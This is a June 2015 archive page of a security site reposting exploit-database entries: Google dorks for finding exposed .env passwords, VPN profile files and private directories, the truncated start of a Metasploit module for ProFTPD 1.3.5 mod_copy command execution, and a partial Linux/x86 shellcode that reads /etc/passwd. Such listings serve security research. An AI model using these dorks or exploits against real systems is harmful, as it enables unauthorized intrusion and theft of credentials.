Monthly Archives: June 2015


White Paper: Developing MIPS Exploits to Hack Routers

Title: Developing MIPS Exploits to Hack Routers
Author: Onur Alanbel

 

By |June 23rd, 2015|White Papers|

White Paper: Privilege Escalation via Client Management Software

Title: Privilege Escalation via Client Management Software

Author: SySS GmbH

 

By |June 23rd, 2015|White Papers|

GHDB – intext:DB_PASSWORD ext:env

Google dork Description: intext:DB_PASSWORD ext:env

Google search: intext:DB_PASSWORD ext:env

Submitted: 2015-05-29

This dork finds env files, usually used in Laravel configuration,
containing passwords and other juicy information.

Author: Augusto Pereira

By |June 23rd, 2015|Files containing passwords|

GHDB – inurl:/dbg-wizard.php

Google dork Description: inurl:/dbg-wizard.php

Google search: inurl:/dbg-wizard.php

Submitted: 2015-06-03

# Exploit Title: Nusphere PHP DBG wizard
# Date: 02-06-2015
# Vendor Homepage: http://www.nusphere.com
# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm
# Version: any
# Exploit Author: Alfred Armstrong
# Contact: http://twitter.com/alfaguru
# Website: http://figure-w.co.uk

DBG Wizard is meant to be used with the DBG PHP debugger as an aid to
configuring it correctly. It is supplied as a PHP script […]

By |June 23rd, 2015|Files containing juicy info|

GHDB – intitle:"index of" "onetoc2" "one"

Google dork Description: intitle:"index of" "onetoc2" "one"

Google search: intitle:"index of" "onetoc2" "one"

Submitted: 2015-06-04

# Exploit Title: intitle:"index of" "onetoc2" "one"
# Google Dork: intitle:"index of" "onetoc2" "one"
# Date: 04/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA

This dork allows you to see OneNote files stored in the open (*.one). […]

By |June 23rd, 2015|Sensitive Directories|

Exploit: ProFTPD 1.3.5 Mod_Copy Command Execution

Advanced Ethical Hacking Institute in Pune
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the […]

By |June 23rd, 2015|Exploits|

Shellcode: Linux/x86 – /etc/passwd Reader (58 bytes)

Linux/x86 – /etc/passwd Reader – 58 bytes

#Greetz : Bomberman(Leader),wiremask.eu
#Author : B3mB4m

#Info
#File descriptor on EBX
#Buffer on ECX
#Bytes to read on EDX

Disassembly of section .text:

08048060 <.text>:
 8048060:    31 c9                    xor    %ecx,%ecx
 8048062:    31 c0                    xor    %eax,%eax
 8048064:    31 d2                    xor    %edx,%edx
 8048066:    51                       push   %ecx
 8048067:    b0 05                    mov    $0x5,%al
 8048069:    68 73 73 77 64           push   $0x64777373
 804806e:    68 […]

By |June 23rd, 2015|Exploits|

White Paper: Escaping VMware Workstation through COM1

Title: Escaping VMware Workstation through COM1
Author: Google Securit

 

By |June 22nd, 2015|White Papers|

GHDB – filetype:pcf vpn OR Group

Google dork Description: filetype:pcf vpn OR Group

Google search: filetype:pcf vpn OR Group

Submitted: 2015-06-10

Google Dork: filetype:pcf vpn OR Group
Author: azupwn

This dork allows you to search for publicly accessible profile
configuration files (.pcf) used by VPN clients. These files typically
contain usernames, passwords, tunneling ports, VPN server information and
other information.

Cheers,

azupwn

By |June 22nd, 2015|Files containing juicy info|

GHDB – inurl:private_files

Google dork Description: inurl:private_files

Google search: inurl:private_files

Submitted: 2015-06-10

Directory private files xD.
By Rootkit.

By |June 22nd, 2015|Sensitive Directories|